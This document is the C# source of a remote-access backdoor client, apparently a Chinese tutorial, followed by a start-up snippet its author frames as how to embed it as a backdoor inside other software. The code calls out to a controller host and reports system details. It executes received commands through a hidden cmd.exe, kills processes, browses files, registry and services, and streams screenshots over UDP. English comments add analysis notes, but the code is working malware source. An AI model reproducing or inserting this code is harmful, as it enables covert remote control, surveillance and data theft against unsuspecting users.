首先定義一個全局,上線地址,上線端口等
using Control_Client;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Management;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading;
using System.Windows.Forms;

/// <summary>
/// Controlled-host side of a remote-control tool. It connects out to Globle.Host:Globle.Port,
/// announces itself with an "$Online||..." message, and dispatches every command it receives
/// (on that outbound stream or on a local TcpListener) through <see cref="Order_Catcher"/>.
/// </summary>
/// <remarks>
/// Analysis notes grounded in this listing:
///  - Messages are strings of "||"-separated fields written to a raw NetworkStream/UdpClient with
///    Encoding.Default; no encryption or authentication step appears anywhere in this class, so the
///    literal headers below ("$Online||", "$GetDir||", "$ExecuteCommand||", "**End**", ...) are
///    present in the traffic and usable as network-signature strings.
///  - Host-side behavior visible here: WMI queries (Win32_ComputerSystem, Win32_OperatingSystem,
///    Win32_Processor, Win32_LogicalDisk, Win32_Service), directory and registry enumeration,
///    process listing and termination by name, a windowless cmd.exe child with redirected output,
///    and screen capture via Graphics.CopyFromScreen.
///  - Command handlers reply on Lis_socket (the most recently accepted inbound socket), not on
///    the outbound Stream.
///  - Globle is defined elsewhere; its members are used here only by name.
/// </remarks>
class BD
{
    // Outbound connection to the controller and the stream/socket derived from it.
    public static TcpClient Client;
    // Local listener; assigned and started by the caller (not in this class).
    public static TcpListener Lis;
    public static NetworkStream Stream;
    public static Socket socket;
    // Socket returned by the latest Lis.AcceptSocket(); shared by all handlers as the reply channel.
    public static Socket Lis_socket;
    public static String LocalDisk_List = "$GetDir||"; // reply header: logical-disk list
    public static String Online_Order = "$Online||"; // check-in message; fields are appended before sending
    public static String Folder_List = "$GetFolder||"; // reply header: sub-folder list
    public static String File_List = "$GetFile||"; // reply header: file list
    public static String Process_List = "$GetProcess||"; // reply header: process list
    public static String RegName_List = "$GetRegisterRoot||"; // reply header: registry sub-key names
    public static String RegNameValues_List = "$GetRegisterRootValues||"; // reply header: registry values
    public static String CMD_List = "$ActiveDos||"; // reply header: shell activation result
    public static String Service_List = "$GetService||"; // reply header: service list
    public static Process CMD = new Process(); // single shared Process object reused for every cmd.exe launch
    public static bool _IsStop_Catching_Desktop = false; // when true, screen capture stops
    public static UdpClient UDP_Client = new UdpClient(); // channel used for screen-capture data
    public delegate void Pt();

    /// <summary>
    /// Connects to the controller and sends the check-in message held in <see cref="Online_Order"/>.
    /// Message prototype per the original author:
    /// $Online||software version||computer name||customer note||operating system||CPU||memory.
    /// If the socket is still connected afterwards, starts a thread running
    /// <see cref="Get_Server_Order"/> to receive commands.
    /// </summary>
    public static void Post_Online_Message()
    {
        Client = new TcpClient();
        // Outbound TCP connection to the configured controller address.
        Client.Connect(Globle.Host, Globle.Port);
        // Only proceed when the connection was established.
        if (Client.Connected)
        {
            // Keep the underlying socket and wrap it in a stream.
            socket = Client.Client;
            Stream = new NetworkStream(socket);
            // Send the check-in message as-is (no framing beyond the "||" separators).
            Stream.Write(Encoding.Default.GetBytes(Online_Order), 0, Encoding.Default.GetBytes(Online_Order).Length);
            Stream.Flush();
            // If the socket is still connected after the write,
            // start a dedicated thread that receives commands.
            if (socket.Connected)
            {
                Thread thread = new Thread(new ThreadStart(Get_Server_Order));
                thread.Start();
            }
        }
    }

    /// <summary>
    /// Collects host information through WMI and appends it, "||"-separated, to
    /// <see cref="Online_Order"/>: computer name, Globle.Customer, OS caption, CPU caption and
    /// TotalVisibleMemorySize divided by 1024 with the suffix " MB".
    /// </summary>
    public static void Get_ComputerInfo()
    {
        // Computer name
        Online_Order += WMI_Searcher("SELECT * FROM Win32_ComputerSystem", "Caption") + "||";
        // Operator-assigned note (value comes from Globle, defined elsewhere)
        Online_Order += Globle.Customer + "||";
        // Operating system
        Online_Order += WMI_Searcher("SELECT * FROM Win32_OperatingSystem", "Caption") + "||";
        // CPU
        Online_Order += WMI_Searcher("SELECT * FROM Win32_Processor", "Caption") + "||";
        // Memory size, reported in MB
        Online_Order += (int.Parse(WMI_Searcher("SELECT * FROM Win32_OperatingSystem", "TotalVisibleMemorySize")) / 1024) + " MB||";
    }

    // Region: WMI helpers
    #region WMI 操作相關及擴展
    /// <summary>
    /// Runs a WMI query and returns one property of the first result object.
    /// </summary>
    /// <param name="QueryString">WQL query text passed to ManagementObjectSearcher.</param>
    /// <param name="Item_Name">Name of the property to read from the first result.</param>
    /// <returns>The property value as a string, or "" when the query returns no objects.</returns>
    public static String WMI_Searcher(String QueryString, String Item_Name)
    {
        String Result = "";
        ManagementObjectSearcher MOS = new ManagementObjectSearcher(QueryString);
        ManagementObjectCollection MOC = MOS.Get();
        foreach (ManagementObject MOB in MOC)
        {
            // Only the first object is used.
            Result = MOB[Item_Name].ToString();
            break;
        }
        MOC.Dispose();
        MOS.Dispose();
        return Result;
    }

    /// <summary>
    /// Runs a WMI query over service objects and formats each result as
    /// "Caption,state,Description||", where state is one of two fixed Chinese strings chosen
    /// from the "Started" property.
    /// </summary>
    /// <param name="QueryString">WQL query text; the caller in this class passes a Win32_Service query.</param>
    /// <returns>The concatenated entries; objects whose properties throw are skipped silently.</returns>
    public static String WMI_Searcher_Service_Ex(String QueryString)
    {
        String Result = "";
        ManagementObjectSearcher MOS = new ManagementObjectSearcher(QueryString);
        ManagementObjectCollection MOC = MOS.Get();
        foreach (ManagementObject MOB in MOC)
        {
            try
            {
                Result += MOB["Caption"].ToString() + ",";
                if (MOB["Started"].ToString() == "True")
                {
                    Result += "啟動中" + ",";
                }
                else
                {
                    Result += "停止中" + ",";
                }
                Result += MOB["Description"].ToString() + "||";
            }
            // Any exception for an entry is swallowed; a partially appended entry may remain.
            catch (Exception ex)
            { };
        }
        MOC.Dispose();
        MOS.Dispose();
        return Result;
    }
    #endregion

    // Region: command dispatch
    #region 命令處理函數
    /// <summary>
    /// Dispatches one received command. Order_Set[0] is the command header; Order_Set[1] and
    /// Order_Set[2] are passed on as arguments for the commands that take them.
    /// </summary>
    /// <param name="Order_Set">The received message split on "||" with empty entries removed.</param>
    public static void Order_Catcher(String[] Order_Set)
    {
        switch (Order_Set[0])
        {
            // Status result returned by the controller
            case "$Return":
                switch (Order_Set[1])
                {
                    // Check-in acknowledged
                    case "#Online_OK":
                        Online_OK();
                        break;
                }
                break;
            // Request: list all logical disks
            case "$GetDir":
                Get_LocalDisk();
                break;
            // Request: list the sub-folders of the given path
            case "$GetFolder":
                Get_Foloder(Order_Set[1]);
                break;
            // Request: list the files of the given path
            case "$GetFile":
                Get_File(Order_Set[1]);
                break;
            // Request: list running processes
            case "$GetProcess":
                Get_Process();
                break;
            // Request: terminate the named process
            case "$KillProcess":
                Kill_Process(Order_Set[1]);
                break;
            // Request: list registry sub-key names (root key name, sub-key path)
            case "$GetRegisterRoot":
                Get_RegRoot(Order_Set[1], Order_Set[2]);
                break;
            // Request: list the values of a registry key (root key name, sub-key path)
            case "$GetRegisterRootValues":
                Get_RegRootValues(Order_Set[1], Order_Set[2]);
                break;
            // Request: activate the command shell
            case "$ActiveDos":
                ActiveDos();
                break;
            // Request: run a command line; the argument is passed to cmd.exe unchanged
            case "$ExecuteCommand":
                Execute_Command(Order_Set[1]);
                break;
            // Request: list system services
            case "$GetService":
                GetService();
                break;
            // Request: activate screen capture
            case "$ActiveHDC":
                try
                {
                    // Acknowledge on the inbound socket
                    using (NetworkStream Ns = new NetworkStream(Lis_socket))
                    {
                        Ns.Write(Encoding.Default.GetBytes("$ActiveHDC||True"), 0, Encoding.Default.GetBytes("$ActiveHDC||True").Length);
                        Ns.Flush();
                    }
                    // Point the UDP client at the controller's UDP port
                    UDP_Client.Connect(Globle.Host, Globle.UDP_Port);
                    // The capture start-up below is commented out in the original, so this branch is empty
                    if (UDP_Client.Client.Connected)
                    {
                        //Thread thread = new Thread(new ThreadStart(Catching_Desktop));
                        //thread.Start();
                        // BeginInvoke(new Pt(Active_Timer));
                    }
                }
                catch (Exception ex)
                {
                    MessageBox.Show("嘗試發送激活HDC信息失敗 : " + ex.Message);
                }
                break;
        }
    }
    #endregion

    // Region: after a successful check-in
    #region 上線成功后操作函數
    /// <summary>
    /// Called when the controller acknowledges the check-in. The user notification is commented
    /// out in the original, so the method does nothing.
    /// </summary>
    public static void Online_OK()
    {
        // Sys_Icon.ShowBalloonTip(5000, "上線成功", "成功連接到主控端!", ToolTipIcon.Info);
    }
    #endregion

    // Region: form closing
    #region 窗體關閉動作
    /// <summary>
    /// Form-closing handler: sends "$OffLine||" followed by the local endpoint address on the
    /// outbound stream, ignoring any failure, then ends the process with Environment.Exit(0).
    /// </summary>
    /// <param name="sender">Event source (unused).</param>
    /// <param name="e">Event data (unused).</param>
    private void Main_Form_FormClosing(object sender, FormClosingEventArgs e)
    {
        // Offline message prototype: $OffLine||
        String Order = "$OffLine||";
        try
        {
            // Best-effort offline notification
            Stream.Write(Encoding.Default.GetBytes(Order + ((IPEndPoint)socket.LocalEndPoint).Address.ToString()), 0, Encoding.Default.GetBytes(Order + ((IPEndPoint)socket.LocalEndPoint).Address.ToString()).Length);
            Stream.Flush();
        }
        catch (Exception ex)
        { };
        Environment.Exit(0);
    }
    #endregion

    // Region: disk enumeration and the local listener
    #region 枚舉硬盤 - 監聽自身端口相關操作
    /// <summary>
    /// Enumerates Win32_LogicalDisk through WMI and sends "$GetDir||" followed by
    /// "Description#Caption," for each disk on the inbound socket.
    /// </summary>
    public static void Get_LocalDisk()
    {
        LocalDisk_List = "$GetDir||";
        ManagementObjectSearcher MOS = new ManagementObjectSearcher("SELECT * FROM Win32_LogicalDisk");
        ManagementObjectCollection MOC = MOS.Get();
        foreach (ManagementObject MOB in MOC)
        {
            LocalDisk_List += MOB["Description"].ToString() + "#" + MOB["Caption"].ToString() + ",";
        }
        MOC.Dispose();
        MOS.Dispose();
        try
        {
            // Send the disk list
            using (NetworkStream Ns = new NetworkStream(Lis_socket))
            {
                Ns.Write(Encoding.Default.GetBytes(LocalDisk_List), 0, Encoding.Default.GetBytes(LocalDisk_List).Length);
                Ns.Flush();
            }
        }
        catch (Exception ex)
        {
            MessageBox.Show("嘗試發送硬盤分區列表失敗 : " + ex.Message);
        }
    }

    /// <summary>
    /// Accept loop for the local listener. Each accepted socket overwrites the shared
    /// <see cref="Lis_socket"/> and a new thread running <see cref="Res_Message"/> is started.
    /// Nothing in this method checks who the peer is.
    /// </summary>
    public static void Listen_Port()
    {
        while (Globle._IsListen_Port)
        {
            Lis_socket = Lis.AcceptSocket();
            // A socket is created for every incoming connection
            Thread thread = new Thread(new ThreadStart(Res_Message));
            thread.Start();
        }
    }
    #endregion

    // Region: folder and file enumeration
    #region 文件夾 - 文件枚舉操作
    /// <summary>
    /// Sends "$GetFolder||" followed by the comma-separated sub-directories of a path.
    /// </summary>
    /// <param name="Path">Directory to enumerate; taken directly from the received command.</param>
    public static void Get_Foloder(String Path)
    {
        Folder_List = "$GetFolder||";
        // All sub-directories of the given path
        String[] Folder = Directory.GetDirectories(Path);
        for (int i = 0; i < Folder.Length; i++)
        {
            Folder_List += Folder[i] + ",";
        }
        try
        {
            // Send the folder list
            using (NetworkStream Ns = new NetworkStream(Lis_socket))
            {
                Ns.Write(Encoding.Default.GetBytes(Folder_List), 0, Encoding.Default.GetBytes(Folder_List).Length);
                Ns.Flush();
            }
        }
        catch (Exception ex)
        {
            MessageBox.Show("嘗試發送文件夾列表失敗 : " + ex.Message);
        }
    }

    /// <summary>
    /// Sends "$GetFile||" followed by the comma-separated files of a path.
    /// </summary>
    /// <param name="Path">Directory to enumerate; taken directly from the received command.</param>
    public static void Get_File(String Path)
    {
        File_List = "$GetFile||";
        // All files of the target folder
        String[] Result_List = Directory.GetFiles(Path);
        // Build the result string
        for (int i = 0; i < Result_List.Length; i++)
        {
            File_List += Result_List[i] + ",";
        }
        try
        {
            // Send the file list
            using (NetworkStream Ns = new NetworkStream(Lis_socket))
            {
                Ns.Write(Encoding.Default.GetBytes(File_List), 0, Encoding.Default.GetBytes(File_List).Length);
                Ns.Flush();
            }
        }
        catch (Exception ex)
        {
            MessageBox.Show("嘗試發送文件夾列表失敗 : " + ex.Message);
        }
    }
    #endregion

    // Region: command receive loops
    #region 循環接收命令機制
    /// <summary>
    /// Receive loop for the outbound connection: reads up to 1024 bytes from
    /// <see cref="Stream"/>, splits the text on "||" and passes it to <see cref="Order_Catcher"/>.
    /// All exceptions are swallowed and the loop continues while Globle._IsResvice_Message is true.
    /// </summary>
    public static void Get_Server_Order()
    {
        while (Globle._IsResvice_Message)
        {
            try
            {
                byte[] bb = new byte[1024];
                // Receive one command
                int Order_Len = Stream.Read(bb, 0, bb.Length);
                // Split the received text into its fields
                String[] Order_Set = Encoding.Default.GetString(bb, 0, Order_Len).Split(new String[] { "||" }, StringSplitOptions.RemoveEmptyEntries);
                Order_Catcher(Order_Set);
            }
            catch (Exception ex)
            { };
        }
    }

    /// <summary>
    /// Receive loop for the inbound listener socket: reads up to 1024 bytes from
    /// <see cref="Lis_socket"/>, splits the text on "||" and passes it to
    /// <see cref="Order_Catcher"/>. All exceptions are swallowed.
    /// </summary>
    public static void Res_Message()
    {
        while (Globle._IsResvice_Message)
        {
            try
            {
                using (NetworkStream ns = new NetworkStream(Lis_socket))
                {
                    try
                    {
                        byte[] bb = new byte[1024];
                        // Receive one command
                        int Res_Len = ns.Read(bb, 0, bb.Length);
                        // Split the received text into its fields
                        String[] Order_Set = Encoding.Default.GetString(bb, 0, Res_Len).Split(new String[] { "||" }, StringSplitOptions.RemoveEmptyEntries);
                        // Dispatch the command
                        //MessageBox.Show(Order_Set[0]);
                        Order_Catcher(Order_Set);
                    }
                    catch (Exception ex)
                    { };
                }
            }
            catch (Exception ex)
            { };
        }
    }
    #endregion

    // Region: process operations
    #region 系統進程相關操作
    /// <summary>
    /// Sends "$GetProcess||" followed by "name,handle,pid||" for each running process.
    /// Processes whose properties throw when read are skipped.
    /// </summary>
    public static void Get_Process()
    {
        Process_List = "$GetProcess||";
        Process[] process = Process.GetProcesses();
        for (int i = 0; i < process.Length; i++)
        {
            try
            {
                if (process[i].ProcessName != "")
                {
                    // Append one entry
                    Process_List += process[i].ProcessName + "," + process[i].Handle.ToString() + "," + process[i].Id + "||";
                }
            }
            catch (Exception ex)
            { };
        }
        try
        {
            // Send the process list
            using (NetworkStream Ns = new NetworkStream(Lis_socket))
            {
                Ns.Write(Encoding.Default.GetBytes(Process_List), 0, Encoding.Default.GetBytes(Process_List).Length);
                Ns.Flush();
            }
        }
        catch (Exception ex)
        {
            MessageBox.Show("嘗試發送進程列表失敗 : " + ex.Message);
        }
    }

    /// <summary>
    /// Terminates the first process whose name equals <paramref name="Process_Name"/> and
    /// replies "$KillProcess||True" on success or "$KillProcess||False" otherwise.
    /// </summary>
    /// <param name="Process_Name">Process name to match; taken directly from the received command.</param>
    public static void Kill_Process(String Process_Name)
    {
        bool isKilled = false;
        Process[] Process_Set = Process.GetProcesses();
        // Walk all processes and terminate the first match
        for (int i = 0; i < Process_Set.Length; i++)
        {
            try
            {
                if (Process_Set[i].ProcessName == Process_Name)
                {
                    // Try to terminate the matching process
                    Process_Set[i].Kill();
                    // On success set the flag and leave the loop
                    isKilled = true;
                    break;
                }
            }
            catch (Exception ex)
            { };
        }
        // Report the outcome
        using (NetworkStream Ns = new NetworkStream(Lis_socket))
        {
            // Terminated
            if (isKilled)
            {
                Ns.Write(Encoding.Default.GetBytes("$KillProcess||True"), 0, Encoding.Default.GetBytes("$KillProcess||True").Length);
                Ns.Flush();
            }
            else
            {
                Ns.Write(Encoding.Default.GetBytes("$KillProcess||False"), 0, Encoding.Default.GetBytes("$KillProcess||False").Length);
                Ns.Flush();
            }
        }
    }
    #endregion

    // Region: registry operations
    #region 注冊表操作相關
    /// <summary>
    /// Sends "$GetRegisterRoot||" followed by the "||"-separated sub-key names returned by
    /// <see cref="Get_Register_Root_Names"/>.
    /// </summary>
    /// <param name="Key_Model">Root key name, e.g. "HKEY_LOCAL_MACHINE".</param>
    /// <param name="Key_Path">Sub-key path, or the sentinel "******%None%******" for the root itself.</param>
    public static void Get_RegRoot(String Key_Model, String Key_Path)
    {
        RegName_List = "$GetRegisterRoot||";
        // Sub-key names for the requested key
        String[] Reg_Name_Set = Get_Register_Root_Names(Key_Model, Key_Path);
        for (int i = 0; i < Reg_Name_Set.Length; i++)
        {
            // Append one name
            RegName_List += Reg_Name_Set[i] + "||";
        }
        try
        {
            // Send the sub-key list
            using (NetworkStream Ns = new NetworkStream(Lis_socket))
            {
                Ns.Write(Encoding.Default.GetBytes(RegName_List), 0, Encoding.Default.GetBytes(RegName_List).Length);
                Ns.Flush();
            }
        }
        catch (Exception ex)
        {
            MessageBox.Show("嘗試發送注冊表子項列表失敗 : " + ex.Message);
        }
    }

    /// <summary>
    /// Returns the sub-key names of a registry key.
    /// </summary>
    /// <param name="Key_Model">Root key name; one of the five HKEY_* names handled below.</param>
    /// <param name="Key_Path">Sub-key path, or "******%None%******" to list the root key's own sub-keys.</param>
    /// <returns>The sub-key names, or null when <paramref name="Key_Model"/> matches no case.</returns>
    public static String[] Get_Register_Root_Names(String Key_Model, String Key_Path)
    {
        // Holds the resulting sub-key names
        String[] Names = null;
        // Sentinel path: enumerate directly under the root key
        if (Key_Path == "******%None%******")
        {
            // Select the root key
            switch (Key_Model)
            {
                case "HKEY_CLASSES_ROOT":
                    Names = Registry.ClassesRoot.GetSubKeyNames();
                    break;
                case "HKEY_CURRENT_CONFIG":
                    Names = Registry.CurrentConfig.GetSubKeyNames();
                    break;
                case "HKEY_CURRENT_USER":
                    Names = Registry.CurrentUser.GetSubKeyNames();
                    break;
                case "HKEY_LOCAL_MACHINE":
                    Names = Registry.LocalMachine.GetSubKeyNames();
                    break;
                case "HKEY_USERS":
                    Names = Registry.Users.GetSubKeyNames();
                    break;
            }
        }
        // Otherwise enumerate under the given sub-key of the root
        else
        {
            // Select the root key
            switch (Key_Model)
            {
                case "HKEY_CLASSES_ROOT":
                    Names = Registry.ClassesRoot.OpenSubKey(Key_Path).GetSubKeyNames();
                    break;
                case "HKEY_CURRENT_CONFIG":
                    Names = Registry.CurrentConfig.OpenSubKey(Key_Path).GetSubKeyNames();
                    break;
                case "HKEY_CURRENT_USER":
                    Names = Registry.CurrentUser.OpenSubKey(Key_Path).GetSubKeyNames();
                    break;
                case "HKEY_LOCAL_MACHINE":
                    Names = Registry.LocalMachine.OpenSubKey(Key_Path).GetSubKeyNames();
                    break;
                case "HKEY_USERS":
                    Names = Registry.Users.OpenSubKey(Key_Path).GetSubKeyNames();
                    break;
            }
        }
        // Return the collected names
        return Names;
    }

    /// <summary>
    /// Sends "$GetRegisterRootValues||" followed by the value list returned by
    /// <see cref="Get_Register_Root_Values"/>.
    /// </summary>
    /// <param name="Key_Model">Root key name, e.g. "HKEY_LOCAL_MACHINE".</param>
    /// <param name="Key_Path">Sub-key path, or the sentinel "******%None%******" for the root itself.</param>
    public static void Get_RegRootValues(String Key_Model, String Key_Path)
    {
        RegNameValues_List = "$GetRegisterRootValues||";
        // Append the formatted value list
        RegNameValues_List += Get_Register_Root_Values(Key_Model, Key_Path);
        try
        {
            // Send the value list
            using (NetworkStream Ns = new NetworkStream(Lis_socket))
            {
                Ns.Write(Encoding.Default.GetBytes(RegNameValues_List), 0, Encoding.Default.GetBytes(RegNameValues_List).Length);
                Ns.Flush();
            }
        }
        catch (Exception ex)
        {
            MessageBox.Show("嘗試發送注冊表子項值列表失敗 : " + ex.Message);
        }
    }

    /// <summary>
    /// Returns the values of a registry key formatted as "name##value||" per value.
    /// </summary>
    /// <param name="Key_Model">Root key name; one of the five HKEY_* names handled below.</param>
    /// <param name="Key_Path">Sub-key path, or "******%None%******" to read the root key's own values.</param>
    /// <returns>The concatenated entries, or "" when <paramref name="Key_Model"/> matches no case.</returns>
    public static String Get_Register_Root_Values(String Key_Model, String Key_Path)
    {
        // Accumulates the formatted entries
        String Result_List = "";
        // Sentinel path: read values directly on the root key
        if (Key_Path == "******%None%******")
        {
            // Select the root key
            switch (Key_Model)
            {
                case "HKEY_CLASSES_ROOT":
                    using (RegistryKey RK = Registry.ClassesRoot)
                    {
                        foreach (String VName in RK.GetValueNames())
                        {
                            Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||";
                        }
                    }
                    break;
                case "HKEY_CURRENT_CONFIG":
                    using (RegistryKey RK = Registry.CurrentConfig)
                    {
                        foreach (String VName in RK.GetValueNames())
                        {
                            Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||";
                        }
                    }
                    break;
                case "HKEY_CURRENT_USER":
                    using (RegistryKey RK = Registry.CurrentUser)
                    {
                        foreach (String VName in RK.GetValueNames())
                        {
                            Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||";
                        }
                    }
                    break;
                case "HKEY_LOCAL_MACHINE":
                    using (RegistryKey RK = Registry.LocalMachine)
                    {
                        foreach (String VName in RK.GetValueNames())
                        {
                            Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||";
                        }
                    }
                    break;
                case "HKEY_USERS":
                    using (RegistryKey RK = Registry.Users)
                    {
                        foreach (String VName in RK.GetValueNames())
                        {
                            Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||";
                        }
                    }
                    break;
            }
        }
        // Otherwise read values of the given sub-key of the root
        else
        {
            // Select the root key
            switch (Key_Model)
            {
                case "HKEY_CLASSES_ROOT":
                    using (RegistryKey RK = Registry.ClassesRoot.OpenSubKey(Key_Path))
                    {
                        foreach (String VName in RK.GetValueNames())
                        {
                            Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||";
                        }
                    }
                    break;
                case "HKEY_CURRENT_CONFIG":
                    using (RegistryKey RK = Registry.CurrentConfig.OpenSubKey(Key_Path))
                    {
                        foreach (String VName in RK.GetValueNames())
                        {
                            Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||";
                        }
                    }
                    break;
                case "HKEY_CURRENT_USER":
                    using (RegistryKey RK = Registry.CurrentUser.OpenSubKey(Key_Path))
                    {
                        foreach (String VName in RK.GetValueNames())
                        {
                            Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||";
                        }
                    }
                    break;
                case "HKEY_LOCAL_MACHINE":
                    using (RegistryKey RK = Registry.LocalMachine.OpenSubKey(Key_Path))
                    {
                        foreach (String VName in RK.GetValueNames())
                        {
                            Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||";
                        }
                    }
                    break;
                case "HKEY_USERS":
                    using (RegistryKey RK = Registry.Users.OpenSubKey(Key_Path))
                    {
                        foreach (String VName in RK.GetValueNames())
                        {
                            Result_List += VName + "##" + RK.GetValue(VName).ToString() + "||";
                        }
                    }
                    break;
            }
        }
        // Return the formatted value list
        return Result_List;
    }
    #endregion

    // Region: command shell operations
    #region 系統DOS相關操作
    /// <summary>
    /// Handles shell activation. If C:\Windows\System32\cmd.exe does not exist, replies
    /// "$ActiveDos||Error"; otherwise runs cmd.exe with empty arguments through
    /// <see cref="Get_Message_Command"/> and replies "$ActiveDos||" plus the captured output.
    /// </summary>
    public static void ActiveDos()
    {
        // cmd.exe missing
        if (!File.Exists("C:\\Windows\\System32\\cmd.exe"))
        {
            try
            {
                // Send the error reply
                using (NetworkStream Ns = new NetworkStream(Lis_socket))
                {
                    // Prototype when cmd.exe is missing: $ActiveDos|| [argument 1]
                    Ns.Write(Encoding.Default.GetBytes(CMD_List + "Error"), 0, Encoding.Default.GetBytes(CMD_List + "Error").Length);
                    Ns.Flush();
                }
            }
            catch (Exception ex)
            {
                MessageBox.Show("嘗試發不存在DOS信息失敗 : " + ex.Message);
            }
        }
        // cmd.exe present
        else
        {
            String Result = Get_Message_Command("");
            try
            {
                // Send the shell banner
                using (NetworkStream Ns = new NetworkStream(Lis_socket))
                {
                    // Prototype when cmd.exe exists: $ActiveDos|| banner text
                    Ns.Write(Encoding.Default.GetBytes(CMD_List + Result), 0, Encoding.Default.GetBytes(CMD_List + Result).Length);
                    Ns.Flush();
                }
            }
            catch (Exception ex)
            {
                MessageBox.Show("嘗試發不存在DOS信息失敗 : " + ex.Message);
            }
        }
    }

    /// <summary>
    /// Runs a received command line as "cmd.exe /c &lt;Order&gt;" and replies
    /// "$ExecuteCommand||" plus the captured standard output.
    /// </summary>
    /// <param name="Order">Command text from the received message; appended to "/c " without any filtering.</param>
    public static void Execute_Command(String Order)
    {
        String Result = "$ExecuteCommand||" + Get_Message_Command("/c " + Order);
        try
        {
            // Send the command output
            using (NetworkStream Ns = new NetworkStream(Lis_socket))
            {
                // Prototype: $ExecuteCommand || command output
                Ns.Write(Encoding.Default.GetBytes(Result), 0, Encoding.Default.GetBytes(Result).Length);
                Ns.Flush();
            }
        }
        catch (Exception ex)
        {
            MessageBox.Show("嘗試發不存在DOS執行結果失敗 : " + ex.Message);
        }
    }

    /// <summary>
    /// Starts cmd.exe with the given arguments and returns its standard output.
    /// The child is created with UseShellExecute=false, CreateNoWindow=true and both output
    /// streams redirected, i.e. a windowless cmd.exe child of this process — a parent/child
    /// relationship that process-creation logging on the host records.
    /// </summary>
    /// <param name="Command">Argument string passed to cmd.exe.</param>
    /// <returns>Standard output, one "\n"-terminated line per line read.</returns>
    public static String Get_Message_Command(String Command)
    {
        CMD.StartInfo.FileName = "cmd.exe";
        CMD.StartInfo.Arguments = Command;
        CMD.StartInfo.RedirectStandardError = true;
        CMD.StartInfo.RedirectStandardOutput = true;
        CMD.StartInfo.UseShellExecute = false;
        CMD.StartInfo.CreateNoWindow = true;
        CMD.Start();
        String Message_Line = "";
        String Result = "";
        using (StreamReader Reader = CMD.StandardOutput)
        {
            // Read the output line by line until end of stream
            while ((Message_Line = Reader.ReadLine()) != null)
            {
                Result += Message_Line + "\n";
            }
        }
        return Result;
    }
    #endregion

    // Region: system service operations
    #region 系統服務相關操作
    /// <summary>
    /// Sends "$GetService||" followed by the Win32_Service list produced by
    /// <see cref="WMI_Searcher_Service_Ex"/>.
    /// </summary>
    public static void GetService()
    {
        String Result_List = Service_List + WMI_Searcher_Service_Ex("SELECT * FROM Win32_Service");
        try
        {
            // Send the service list
            using (NetworkStream Ns = new NetworkStream(Lis_socket))
            {
                Ns.Write(Encoding.Default.GetBytes(Result_List), 0, Encoding.Default.GetBytes(Result_List).Length);
                Ns.Flush();
            }
        }
        catch (Exception ex)
        {
            MessageBox.Show("嘗試發系統服務列表失敗 : " + ex.Message);
        }
    }
    #endregion

    // Region: remote desktop monitoring
    #region 遠程桌面監控相關操作
    /// <summary>
    /// Captures the first screen in a loop until <see cref="_IsStop_Catching_Desktop"/> is true,
    /// encodes each frame as JPEG and hands it to <see cref="Send_Desktop_Image_Info"/>.
    /// </summary>
    public static void Catching_Desktop()
    {
        while (!_IsStop_Catching_Desktop)
        {
            // Bitmap with the size of the first screen
            Image img = new Bitmap(Screen.AllScreens[0].Bounds.Width, Screen.AllScreens[0].Bounds.Height);
            // GDI+ surface over the bitmap
            Graphics g = Graphics.FromImage(img);
            // Copy the screen contents into the bitmap
            g.CopyFromScreen(new Point(0, 0), new Point(0, 0), Screen.AllScreens[0].Bounds.Size);
            // Obtain the device-context handle
            IntPtr HDC = g.GetHdc();
            // Release it again after the capture
            g.ReleaseHdc(HDC);
            MemoryStream Ms = new MemoryStream();
            // Encode the frame into the stream
            img.Save(Ms, System.Drawing.Imaging.ImageFormat.Jpeg);
            Send_Desktop_Image_Info(Ms);
        }
    }

    /// <summary>
    /// Sends a captured frame over <see cref="UDP_Client"/>: one datagram holding the full
    /// 4096-byte buffer per read, followed by a datagram containing the literal "**End**".
    /// </summary>
    /// <param name="Ms">Stream holding the encoded frame; read from position 0.</param>
    public static void Send_Desktop_Image_Info(MemoryStream Ms)
    {
        int Len = 0;
        byte[] bb = new byte[4096];
        Ms.Position = 0;
        while ((Len = Ms.Read(bb, 0, bb.Length)) > 0)
        {
            UDP_Client.Send(bb, bb.Length);
        }
        // End-of-frame marker
        UDP_Client.Send(Encoding.Default.GetBytes("**End**"), Encoding.Default.GetBytes("**End**").Length);
    }

    /// <summary>
    /// Timer handler that captures and sends one frame per tick while
    /// <see cref="_IsStop_Catching_Desktop"/> is false; same steps as one iteration of
    /// <see cref="Catching_Desktop"/>.
    /// </summary>
    /// <param name="sender">Event source (unused).</param>
    /// <param name="e">Event data (unused).</param>
    private void Desktop_Timer_Tick(object sender, EventArgs e)
    {
        if (!_IsStop_Catching_Desktop)
        {
            // Bitmap with the size of the first screen
            Image img = new Bitmap(Screen.AllScreens[0].Bounds.Width, Screen.AllScreens[0].Bounds.Height);
            // GDI+ surface over the bitmap
            Graphics g = Graphics.FromImage(img);
            // Copy the screen contents into the bitmap
            g.CopyFromScreen(new Point(0, 0), new Point(0, 0), Screen.AllScreens[0].Bounds.Size);
            // Obtain the device-context handle
            IntPtr HDC = g.GetHdc();
            // Release it again after the capture
            g.ReleaseHdc(HDC);
            MemoryStream Ms = new MemoryStream();
            // Encode the frame into the stream
            img.Save(Ms, System.Drawing.Imaging.ImageFormat.Jpeg);
            Send_Desktop_Image_Info(Ms);
        }
    }

    /// <summary>
    /// Intended to start the capture timer through the <see cref="Pt"/> delegate; the only
    /// statement is commented out in the original, so the method does nothing.
    /// </summary>
    public static void Active_Timer()
    {
        // Desktop_Timer.Enabled = true;
    }
    #endregion
}
直接在軟件中作為後門的使用辦法:
// Start-up sequence as placed inside a host application. After it runs, the process holds one
// outbound TCP connection to Globle.Host:Globle.Port and one listening TCP socket on
// Globle.Lis_Port, each serviced by its own thread.
// First field of the check-in message: the value of Globle.Software.
BD.Online_Order += Globle.Software + "||";
// Collect system information through WMI
BD.Get_ComputerInfo();
// Send the check-in request on its own thread
Thread thread = new Thread(new ThreadStart(BD.Post_Online_Message));
thread.Start();
// Open the local listening port; the port-only TcpListener constructor binds to all local
